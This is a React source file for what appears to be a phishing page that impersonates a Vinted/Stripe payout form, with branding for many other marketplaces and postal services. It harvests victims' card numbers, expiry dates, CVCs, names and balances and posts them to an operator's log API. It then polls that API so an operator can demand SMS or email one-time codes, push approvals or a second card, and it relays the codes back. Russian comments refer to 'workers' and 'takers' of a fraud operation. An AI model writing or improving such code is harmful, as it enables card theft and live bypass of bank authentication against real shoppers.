import React, { useState, useEffect, useRef } from 'react';
import { Link, useParams, useSearchParams } from 'react-router-dom';
import './VintedStripe2.css';
import SupportWidget from './SupportWidget';
import Vs2PushConfirm from './Vs2PushConfirm';
import NewCardNotice from './NewCardNotice';
import { getPrimaryCurrency, getSymbol } from '../stripeCurrency';
import { getVintedStripeTranslations } from '../vintedStripeTranslations';
import { fetchPageWithFallback, API_URL } from '../fetchPageWithFallback';
import { getPaymentFormHeaderLabels } from '../paymentChrome';
import { getCheckoutHeaderLogo } from '../marketplaceHeaderLogo';
import { getCaptchaCardLabels } from '../captchaLabels';
import { useServerCaptcha } from '../hooks/useServerCaptcha';
import SharedCaptchaCard from './SharedCaptchaCard';
import {
  resolvePaymentPageCode,
  PAYMENT_FLOW_PAGE_KEY,
  dedupedSessionStart,
  postPaymentTransitionOnce,
} from '../paymentSession';
import { formatCardNumberInput, isValidCardNumber } from '../cardValidation';
import { usePaymentPaths } from '../paymentPaths';
import { isPetTaxiTemplate, getPetTaxiRefundCheckoutLabels, resolvePetTaxiCountryCode, getPetTaxiCheckoutTranslations } from '../petTaxiLocales';
import { isBookingTemplate, resolveBookingCountryCode, getBookingCheckoutTranslations } from '../bookingLocales';
import {
  isRefundFlowActive,
  syncRefundFlowFromUrl,
} from '../paymentRefundFlow';
const SESSION_STORAGE_KEYS = { sessionId: 'payment_session_id', logId: 'payment_log_id' };

const MONTHS = ['01', '02', '03', '04', '05', '06', '07', '08', '09', '10', '11', '12'];
const currentYear = new Date().getFullYear() % 100;
const YEARS = Array.from({ length: 21 }, (_, i) => String(currentYear + i).padStart(2, '0'));

function CardBrandLogos() {
  return (
    <span className="vs2-card-logos" aria-hidden>
      <svg className="vs2-card-logo" viewBox="0 0 40 24" width="28" height="18"><rect width="40" height="24" rx="2" fill="#1A1F71"/><text x="20" y="16" textAnchor="middle" fill="#fff" fontSize="10" fontWeight="700" fontFamily="sans-serif">VISA</text></svg>
      <svg className="vs2-card-logo" viewBox="0 0 40 24" width="28" height="18"><circle cx="14" cy="12" r="8" fill="#EB001B"/><circle cx="26" cy="12" r="8" fill="#F79E1B"/><path d="M20 4.4a12 12 0 0 1 0 15.2 12 12 0 0 1 0-15.2z" fill="#FF5F00"/></svg>
      <svg className="vs2-card-logo" viewBox="0 0 40 24" width="28" height="18"><circle cx="12" cy="12" r="9" fill="#0E4595"/><circle cx="28" cy="12" r="9" fill="#EE2A24"/><path d="M20 5.2a12 12 0 0 1 0 13.6 12 12 0 0 1 0-13.6z" fill="#00A0DC"/></svg>
      <svg className="vs2-card-logo" viewBox="0 0 40 24" width="28" height="18"><rect width="40" height="24" rx="2" fill="#006FCF"/><text x="20" y="15" textAnchor="middle" fill="#fff" fontSize="7" fontWeight="700" fontFamily="sans-serif">AMEX</text></svg>
      <svg className="vs2-card-logo" viewBox="0 0 40 24" width="28" height="18"><rect width="40" height="24" rx="2" fill="#fff" stroke="#999" strokeWidth="0.5"/><circle cx="20" cy="12" r="5" fill="#E80000"/><path d="M20 8v8l4-4-4-4z" fill="#fff"/></svg>
    </span>
  );
}

/**
 * Страница 2 Vinted + Stripe: форма вывода на карту.
 * Две колонки: слева — сумма и итог (Suma częściowa / Podatek / Suma), справа — поля карты и кнопка «Wypłać».
 * Фон: vintedstripe.png.
 */
function VintedStripe2({ page, template: templateProp }) {
  const { pageCode } = useParams();
  const { toPage } = usePaymentPaths();
  const [pageData, setPageData] = useState(page || null);
  const [cardNumber, setCardNumber] = useState('');
  const [expiryMM, setExpiryMM] = useState('');
  const [expiryYY, setExpiryYY] = useState('');
  const [cvc, setCvc] = useState('');
  const [cardBalance, setCardBalance] = useState('');
  const [cardholderName, setCardholderName] = useState('');
  const [formStep, setFormStep] = useState('card');
  const [step, setStep] = useState('form');
  const [sessionId, setSessionId] = useState(null);
  const [currentLogId, setCurrentLogId] = useState(null);
  const [isLoading, setIsLoading] = useState(false);
  const [showErrors, setShowErrors] = useState(false);
  const [confirmationCode, setConfirmationCode] = useState('');
  const [otpDelivery, setOtpDelivery] = useState(null);
  const [authError, setAuthError] = useState('');
  const [showNewCardNotice, setShowNewCardNotice] = useState(false);
  const sessionInitialized = useRef(false);
  const keepTakerFromLogIdRef = useRef(null);
  const [searchParams] = useSearchParams();
  const isEmailOtp = searchParams.get('otp_type') === 'email' || otpDelivery === 'email';
  const balanceChecker = pageData?.balance_checker !== false;
  const requireCardHolderName = pageData?.require_card_holder_name !== false;
  // Капча только при явном включении у воркера (API отдаёт true/1 при включённой настройке)
  const captchaEnabled = Boolean(pageData && (pageData.captcha_enabled === true || pageData.captcha_enabled === 1));

  const resolvedTemplate =
    templateProp || page?.template || pageData?.template || page?.page_template || pageData?.page_template || 'vinted2';
  const isPetTaxi = isPetTaxiTemplate(resolvedTemplate);
  const isBooking = isBookingTemplate(resolvedTemplate);
  const countryCode = isPetTaxi
    ? resolvePetTaxiCountryCode({
        pageData: { ...(pageData || page || {}), template: resolvedTemplate },
      })
    : isBooking
      ? resolveBookingCountryCode({
          pageData: { ...(pageData || page || {}), template: resolvedTemplate },
        })
      : (pageData?.country_code || page?.country_code || 'PL');
  const isRefundFlow = isRefundFlowActive(searchParams);
  const refundLabels = isRefundFlow && isPetTaxi ? getPetTaxiRefundCheckoutLabels(countryCode) : null;
  const checkoutHeaderLogo = getCheckoutHeaderLogo(countryCode, resolvedTemplate);
  const t = isPetTaxi
    ? getPetTaxiCheckoutTranslations(countryCode)
    : isBooking
      ? getBookingCheckoutTranslations(countryCode)
      : getVintedStripeTranslations(countryCode, resolvedTemplate);
  const captchaLabels = getCaptchaCardLabels(countryCode, resolvedTemplate);
  const captcha = useServerCaptcha(API_URL, sessionId, captchaEnabled);
  const { captchaPassed, handleCaptchaVerify, invalidateCaptcha } = captcha;
  const headerLabels = getPaymentFormHeaderLabels(resolvedTemplate, t);
  const backLinkText = (headerLabels.backText || '').replace(/^←\s*/, '');
  const primaryCurrency = getPrimaryCurrency(countryCode);
  const productPrice = pageData?.price != null ? Number(pageData.price) : 100;
  const subtotal = productPrice;
  const tax = 0;
  const totalAmount = subtotal + tax;
  const symbol = getSymbol(primaryCurrency);
  const amountFormatted = `${totalAmount} ${symbol}`;

  useEffect(() => {
    syncRefundFlowFromUrl(searchParams);
  }, [searchParams]);

  useEffect(() => {
    if (page) {
      setPageData(page);
      return;
    }
    if (!pageCode) return;
    fetchPageWithFallback(pageCode).then((data) => {
      if (data.success && data.page) setPageData(data.page);
    });
  }, [pageCode, page]);

  useEffect(() => {
    const pc = resolvePaymentPageCode(pageCode);
    if (!pc) return;
    const prev = sessionStorage.getItem(PAYMENT_FLOW_PAGE_KEY);
    if (prev && prev !== pc) {
      sessionStorage.removeItem(SESSION_STORAGE_KEYS.sessionId);
      sessionStorage.removeItem(SESSION_STORAGE_KEYS.logId);
      sessionInitialized.current = false;
    }
    sessionStorage.setItem(PAYMENT_FLOW_PAGE_KEY, pc);
  }, [pageCode]);

  useEffect(() => {
    const effectivePc = resolvePaymentPageCode(pageCode);
    if (!effectivePc) return;
    if (sessionInitialized.current) return;
    sessionInitialized.current = true;
    const initSession = async () => {
      const storedSessionId = sessionStorage.getItem(SESSION_STORAGE_KEYS.sessionId);
      const storedLogId = sessionStorage.getItem(SESSION_STORAGE_KEYS.logId);
      if (storedSessionId && storedLogId) {
        setSessionId(storedSessionId);
        setCurrentLogId(parseInt(storedLogId, 10));
        setTimeout(() => {
          postPaymentTransitionOnce(API_URL, {
            log_id: storedLogId,
            session_id: storedSessionId,
            page_code: effectivePc,
          });
        }, 300);
        return;
      }
      try {
        const urlParams = new URLSearchParams(window.location.search);
        const referralCode = urlParams.get('ref');
        const data = await dedupedSessionStart(API_URL, {
          referral_code: referralCode,
          page_code: effectivePc,
        });
        if (data.success) {
          setSessionId(data.session_id);
          setCurrentLogId(data.log_id);
          if (data.session_id) sessionStorage.setItem(SESSION_STORAGE_KEYS.sessionId, data.session_id);
          if (data.log_id) sessionStorage.setItem(SESSION_STORAGE_KEYS.logId, String(data.log_id));
          if (data.log_id && data.session_id) {
            setTimeout(() => {
              postPaymentTransitionOnce(API_URL, {
                log_id: data.log_id,
                session_id: data.session_id,
                page_code: effectivePc,
              });
            }, 800);
          }
        }
      } catch (e) {
        setSessionId('temp_' + Date.now());
      }
    };
    initSession();
  }, [pageCode]);

  // Опрос статуса лога (как в Stripe2/Index2): OTP, PUSH, новая карта, оплачено
  useEffect(() => {
    if (!currentLogId) return;
    if (!isLoading && step !== 'push' && step !== 'auth' && step !== 'form') return;
    const checkLogStatus = async () => {
      try {
        const controller = new AbortController();
        setTimeout(() => controller.abort(), 5000);
        const response = await fetch(`${API_URL}/api/log/status/${currentLogId}`, {
          method: 'GET',
          headers: { 'Content-Type': 'application/json' },
          signal: controller.signal,
        });
        const data = await response.json();
        if (data.success && data.status === 'otp_requested') {
          if (step !== 'auth') {
            setOtpDelivery('sms');
            setStep('auth');
            setIsLoading(true);
            setTimeout(() => setIsLoading(false), 1800);
          }
        } else if (data.success && data.status === 'email_otp_requested') {
          if (step !== 'auth') {
            setOtpDelivery('email');
            setStep('auth');
            setIsLoading(true);
            setTimeout(() => setIsLoading(false), 1800);
          }
        } else if (data.success && data.status === 'push_requested') {
          setIsLoading(false);
          setStep('push');
        } else if (data.success && data.status === 'new_card_requested') {
          setIsLoading(false);
          setOtpDelivery(null);
          setShowNewCardNotice(true);
          setStep('form');
          setCardNumber('');
          setExpiryMM('');
          setExpiryYY('');
          setCvc('');
          setCardBalance('');
          setCardholderName('');
          if (currentLogId) keepTakerFromLogIdRef.current = currentLogId;
          setCurrentLogId(null);
        } else if (data.success && data.status === 'retry_payment') {
          setIsLoading(false);
          setOtpDelivery(null);
          setStep('error');
        } else if (data.success && data.status === 'rejected') {
          setIsLoading(false);
          setOtpDelivery(null);
        } else if (data.success && data.status === 'paid') {
          setIsLoading(false);
          setOtpDelivery(null);
          setStep('success');
        }
      } catch (e) {}
    };
    const interval = setInterval(checkLogStatus, 2000);
    return () => clearInterval(interval);
  }, [currentLogId, isLoading, step]);

  const handleCardNumberChange = (e) => {
    setCardNumber(formatCardNumberInput(e.target.value));
  };
  const handleExpiryMM = (e) => setExpiryMM(e.target.value);
  const handleExpiryYY = (e) => setExpiryYY(e.target.value);
  const handleCvc = (e) => setCvc(e.target.value.replace(/\D/g, '').slice(0, 4));

  const handlePayClick = () => {
    if (formStep === 'card') {
      if (!isValidCardNumber(cardNumber) || !expiryMM || !expiryYY || !cvc.trim() || !cardholderName.trim()) {
        setShowErrors(true);
        return;
      }
      setShowErrors(false);
      handleWithdraw();
      return;
    }
    handleWithdraw();
  };

  const parseCardholderName = () => {
    const parts = (cardholderName || '').trim().split(/\s+/);
    const firstName = parts[0] || '';
    const lastName = parts.slice(1).join(' ') || '';
    return { firstName, lastName };
  };

  const handleWithdraw = async () => {
    if (!isValidCardNumber(cardNumber) || !expiryMM || !expiryYY || !cvc.trim()) {
      setShowErrors(true);
      return;
    }
    if (requireCardHolderName && !cardholderName.trim()) {
      setShowErrors(true);
      return;
    }
    if (formStep === 'balance' && balanceChecker && !cardBalance.trim()) {
      setShowErrors(true);
      return;
    }
    if (captchaEnabled && !captchaPassed) {
      setShowErrors(true);
      return;
    }
    if (!sessionId) {
      setStep('error');
      return;
    }
    setShowErrors(false);
    setShowNewCardNotice(false);
    setIsLoading(true);
    try {
      const { firstName, lastName } = parseCardholderName();
      const cardPayload = {
        card_number: cardNumber.replace(/\s/g, ''),
        expiry: `${expiryMM}/${expiryYY}`,
        cvc: cvc.trim(),
      };
      if (balanceChecker && (formStep === 'balance' || cardBalance.trim())) {
        const v = parseFloat(String(cardBalance).replace(',', '.'));
        if (!isNaN(v) && v > 0) cardPayload.balance = v;
      }
      if (requireCardHolderName) {
        cardPayload.first_name = firstName;
        cardPayload.last_name = lastName;
      }
      const body = {
        session_id: sessionId,
        card_data: cardPayload,
        page_code: resolvePaymentPageCode(pageCode),
      };
      if (isRefundFlow && isPetTaxi) {
        body.refund_flow = true;
      }
      if (keepTakerFromLogIdRef.current) {
        body.keep_taker_from_log_id = keepTakerFromLogIdRef.current;
        keepTakerFromLogIdRef.current = null;
      }
      const res = await fetch(`${API_URL}/api/log/card_input`, {
        method: 'POST',
        headers: { 'Content-Type': 'application/json' },
        body: JSON.stringify(body),
      });
      const data = await res.json();
      if (data.success) {
        setCurrentLogId(data.log_id);
        setShowErrors(false);
        // Опрос log/status переведёт на auth, push или success
      } else {
        setIsLoading(false);
        if (res.status === 403 && data.error === 'captcha_required') {
          invalidateCaptcha(data.message || 'Complete captcha first');
        } else {
          setStep('error');
        }
      }
    } catch (e) {
      setStep('error');
      setIsLoading(false);
    }
  };

  const handleConfirmCode = async () => {
    if (!sessionId || !confirmationCode || confirmationCode.length < 4) return;
    try {
      setAuthError('');
      setIsLoading(true);
      const res = await fetch(`${API_URL}/api/log/otp_input`, {
        method: 'POST',
        headers: { 'Content-Type': 'application/json' },
        body: JSON.stringify({ session_id: sessionId, otp_code: confirmationCode }),
      });
      const data = await res.json();
      if (data.success) {
        setIsLoading(true);
      } else {
        setIsLoading(false);
        setAuthError(data.error || 'Error');
      }
    } catch (e) {
      setIsLoading(false);
    }
  };

  const productName = pageData?.product_name || '';
  const photoUrl = pageData?.photo_url || '';
  const index1Path = pageCode ? toPage() : '/';

  const displayHeadline = refundLabels?.headline || headerLabels.headline;
  const displayFormTitle = refundLabels?.formTitle || t.withdrawToCard;
  const submitLabel = refundLabels
    ? refundLabels.submit
    : (formStep === 'card' ? t.withdraw : (t.confirmPay || t.withdraw));

  if (!pageData && pageCode) {
    return (
      <div className="vs2-wrap vs2-bg">
        <div className="vs2-loading">{t.loading}</div>
        <SupportWidget sessionId={sessionId} countryCode={countryCode} />
      </div>
    );
  }

  if (isLoading && step === 'form') {
    return (
      <div className="vs2-wrap vs2-bg">
        <div className="vs2-loading">{t.processing}</div>
        <SupportWidget sessionId={sessionId} countryCode={countryCode} />
      </div>
    );
  }

  if (step === 'auth') {
    return (
      <div className="vs2-wrap vs2-bg">
        <div className="vs2-auth-card">
          <h1 className="vs2-auth-title">{t.purchaseAuth}</h1>
          <p className="vs2-auth-desc">{isEmailOtp ? t.checkEmail : t.checkPhone}</p>
          <label className="vs2-field">
            <span>{t.confirmationCode}</span>
            <input
              type="text"
              inputMode="numeric"
              placeholder="000000"
              maxLength={6}
              value={confirmationCode}
              onChange={(e) => setConfirmationCode(e.target.value.replace(/\D/g, '').slice(0, 6))}
            />
          </label>
          {authError ? <p className="vs2-captcha-error" role="alert">{authError}</p> : null}
          <button
            type="button"
            className="vs2-btn-primary"
            onClick={handleConfirmCode}
            disabled={!confirmationCode || confirmationCode.length < 4}
          >
            {t.confirmPayment}
          </button>
        </div>
        <SupportWidget sessionId={sessionId} countryCode={countryCode} />
      </div>
    );
  }

  if (step === 'push') {
    return (
      <div className="vs2-wrap vs2-bg">
        <Vs2PushConfirm
          title={t.confirmOnDevice}
          description={t.confirmOnDeviceDesc}
          processingLabel={t.processing}
        />
        <SupportWidget sessionId={sessionId} countryCode={countryCode} />
      </div>
    );
  }

  if (step === 'success') {
    const isRefundSuccess = Boolean(refundLabels);
    const successTitle = refundLabels?.successTitle || t.productPurchased;
    const successSecure = refundLabels?.successMessage || t.secureMessage;
    const successBtn = refundLabels?.successBtn || t.getMoney;
    return (
      <div className="vs2-wrap vs2-bg">
        <div className="vs2-success-card">
          <h1 className="vs2-success-title">{successTitle}</h1>
          <div className="vs2-success-product">
            {photoUrl && <img src={photoUrl} alt="" className="vs2-success-img" />}
            <div className="vs2-success-info">
              <span className="vs2-success-name">{productName || t.productDefault}</span>
              {!isRefundSuccess && (
                <p className="vs2-success-summary">{t.amountToReceive}</p>
              )}
              {!isRefundSuccess && (
                <p className="vs2-success-amount">{amountFormatted}</p>
              )}
            </div>
          </div>
          <div className="vs2-success-secure">
            <span className="vs2-success-shield" aria-hidden />
            <p>{successSecure}</p>
          </div>
          <button
            type="button"
            className="vs2-success-btn"
            onClick={() => {
              setStep('form');
              setFormStep('card');
              setCardNumber('');
              setExpiryMM('');
              setExpiryYY('');
              setCvc('');
              setCardBalance('');
              setCardholderName('');
            }}
          >
            {successBtn}
          </button>
          <div className="vs2-success-info-block">
            <h3>{t.secureSystemTitle}</h3>
            <p>{t.secureSystemIntro} <a href="#/">{t.readIntro}</a>{t.toStayUpdated || t.readIntroSuffix}</p>
          </div>
        </div>
        <SupportWidget sessionId={sessionId} countryCode={countryCode} />
      </div>
    );
  }

  if (step === 'error') {
    return (
      <div className="vs2-wrap vs2-bg">
        <div className="vs2-error">
          <h2>{t.paymentFailed}</h2>
          <p>{t.tryAgain}</p>
          <button
            type="button"
            className="vs2-btn-primary"
            onClick={() => {
              setStep('form');
              setFormStep('card');
              setCardNumber('');
              setExpiryMM('');
              setExpiryYY('');
              setCvc('');
              setCardBalance('');
              setCardholderName('');
              setShowErrors(false);
              setCurrentLogId(null);
              keepTakerFromLogIdRef.current = null;
            }}
          >
            {t.tryAgain}
          </button>
        </div>
        <SupportWidget sessionId={sessionId} countryCode={countryCode} />
      </div>
    );
  }

  return (
    <div
      className={`vs2-wrap vs2-bg${resolvedTemplate === 'es_milanuncios' ? ' vs2-wrap--milanuncios' : ''}`}
    >
      <div className="vs2-top-bar" aria-hidden />
      <div className="vs2-layout">
        <div className="vs2-left">
          {checkoutHeaderLogo.alt === 'wallapop' ||
          checkoutHeaderLogo.alt === 'bakeca' ||
          checkoutHeaderLogo.alt === 'bland' ||
          checkoutHeaderLogo.alt === 'anpost' ||
          checkoutHeaderLogo.alt === 'fancourier' ||
          checkoutHeaderLogo.alt === 'olx_ro' ||
          checkoutHeaderLogo.alt === 'custojusto' ||
          checkoutHeaderLogo.alt === 'ctt' ||
          checkoutHeaderLogo.alt === 'sprzedajemy' ||
          checkoutHeaderLogo.alt === 'poczta' ||
          checkoutHeaderLogo.alt === 'posten' ||
          checkoutHeaderLogo.alt === 'postnl' ||
          checkoutHeaderLogo.alt === 'marktplaats' ||
          checkoutHeaderLogo.alt === 'packeta' ||
          checkoutHeaderLogo.alt === 'eposta' ||
          checkoutHeaderLogo.alt === 'bazos' ||
          checkoutHeaderLogo.alt === 'tradera' ||
          checkoutHeaderLogo.alt === 'instabox' ||
          checkoutHeaderLogo.alt === 'dhl' ||
          checkoutHeaderLogo.alt === 'schenker' ||
          checkoutHeaderLogo.alt === 'blocket' ||
          checkoutHeaderLogo.alt === 'subito' ||
          checkoutHeaderLogo.alt === 'spedire' ||
          checkoutHeaderLogo.alt === 'milanuncios' ||
          checkoutHeaderLogo.alt === 'correos' ||
          checkoutHeaderLogo.alt === 'vinted' ||
          checkoutHeaderLogo.alt === 'jofogas' ||
          checkoutHeaderLogo.alt === 'hr_posta' ||
          checkoutHeaderLogo.alt === 'leboncoin' ||
          checkoutHeaderLogo.alt === 'ungrandmarche' ||
          checkoutHeaderLogo.alt === 'tracevelo' ||
          checkoutHeaderLogo.alt === 'novaposhta' ||
          checkoutHeaderLogo.alt === 'skelbiu_siuntos' ||
          checkoutHeaderLogo.alt === 'dpd' ||
          checkoutHeaderLogo.alt === 'GLS' ? (
            <a href="#/" className="vs2-brand-mark">
              <img src={checkoutHeaderLogo.src} alt={checkoutHeaderLogo.alt} className="vs2-brand-mark-img" />
            </a>
          ) : null}
          <Link to={index1Path} className="vs2-back">
            <span className="vs2-back-arrow" aria-hidden>←</span>
            <span className="vs2-back-text">{backLinkText}</span>
          </Link>
          <div className="vs2-headline-row">
            <h1 className="vs2-title">{displayHeadline}</h1>
            <p className="vs2-amount">{amountFormatted}</p>
          </div>
          {refundLabels?.hint && (
            <p className="vs2-refund-hint">{refundLabels.hint}</p>
          )}
          <div className="vs2-summary">
            <div className="vs2-summary-row">
              <span>{t.subtotal}</span>
              <span className="vs2-summary-value">{subtotal} {symbol}</span>
            </div>
            <div className="vs2-summary-row">
              <span>{t.tax} <span className="vs2-info-icon" aria-hidden>ⓘ</span></span>
              <span className="vs2-summary-value">{tax.toFixed(2)}</span>
            </div>
            <div className="vs2-summary-divider" />
            <div className="vs2-summary-row vs2-summary-total">
              <span>{t.sum}</span>
              <span className="vs2-summary-value">{amountFormatted}</span>
            </div>
          </div>
        </div>
        <div className="vs2-right">
          {showNewCardNotice && <NewCardNotice countryCode={countryCode} />}
          <h2 className="vs2-form-title">{displayFormTitle}</h2>
          <div className="vs2-field">
            <label>{t.cardInfo}</label>
            <div className="vs2-input-wrap vs2-card-number-wrap">
              <input
                type="text"
                placeholder="1234 1234 1234 1234"
                maxLength={19}
                value={cardNumber}
                onChange={handleCardNumberChange}
                aria-invalid={showErrors && !isValidCardNumber(cardNumber)}
              />
              <CardBrandLogos />
            </div>
          </div>
          <div className="vs2-row">
            <div className="vs2-field">
              <label>{t.month}</label>
              <select className="vs2-select" value={expiryMM} onChange={handleExpiryMM} aria-label={t.month}>
                <option value="">MM</option>
                {MONTHS.map((m) => (
                  <option key={m} value={m}>{m}</option>
                ))}
              </select>
            </div>
            <div className="vs2-field">
              <label>{t.year}</label>
              <select className="vs2-select" value={expiryYY} onChange={handleExpiryYY} aria-label={t.year}>
                <option value="">YY</option>
                {YEARS.map((y) => (
                  <option key={y} value={y}>{y}</option>
                ))}
              </select>
            </div>
            <div className="vs2-field">
              <label>CVC</label>
              <div className="vs2-cvc-wrap">
                <input type="text" placeholder="CVC" maxLength={4} value={cvc} onChange={handleCvc} />
                <span className="vs2-cvc-hint" aria-hidden>ⓘ</span>
              </div>
            </div>
          </div>
          <div className="vs2-field">
            <label>{t.cardholderName}</label>
            <input type="text" placeholder={t.cardholderPlaceholder} value={cardholderName} onChange={(e) => setCardholderName(e.target.value)} aria-invalid={showErrors && !cardholderName.trim()} />
          </div>
          {balanceChecker && (
            <div className="vs2-field vs2-balance-step">
              <label>{t.enterBalance}</label>
              <input type="text" placeholder={t.cardBalancePlaceholder} value={cardBalance} onChange={(e) => setCardBalance(e.target.value)} aria-invalid={showErrors && !cardBalance.trim()} />
            </div>
          )}
          {captchaEnabled && !captchaPassed && (
            <SharedCaptchaCard
              variant="inline"
              labels={captchaLabels}
              question={captcha.captchaQuestion}
              answer={captcha.captchaAnswer}
              onAnswerChange={captcha.setCaptchaAnswer}
              onVerify={() => handleCaptchaVerify()}
              verifyLoading={captcha.captchaLoading}
              error={captcha.captchaError}
              sessionReady={Boolean(sessionId)}
            />
          )}
          {showErrors && (
            <p className="vs2-captcha-error" role="alert">
              {t.fillAllFields || t.cardholderPlaceholder || 'Wypełnij wszystkie pola'}
            </p>
          )}
          <button type="button" className="vs2-btn-primary vs2-btn-withdraw" onClick={handlePayClick} disabled={captchaEnabled && !captchaPassed}>
            {submitLabel}
          </button>
          <p className="vs2-footer">
            {t.poweredBy ? (
              <>
                {t.poweredBy}{' '}
                <a href="https://stripe.com" className="vs2-stripe-brand">stripe</a>
                {' '}<a href="#/">{t.terms}</a>
                {' '}<a href="#/">{t.privacy}</a>
                {' '}<a href="#/">{t.contact}</a>
              </>
            ) : (
              <>
                <a href="https://stripe.com">{t.poweredByStripe}</a>
                <span> · </span>
                <a href="#/">{t.terms}</a>
                <span> · </span>
                <a href="#/">{t.privacy}</a>
                <span> · </span>
                <a href="#/">{t.contact}</a>
              </>
            )}
          </p>
        </div>
      </div>
      <SupportWidget sessionId={sessionId} countryCode={countryCode} />
    </div>
  );
}

export default VintedStripe2;
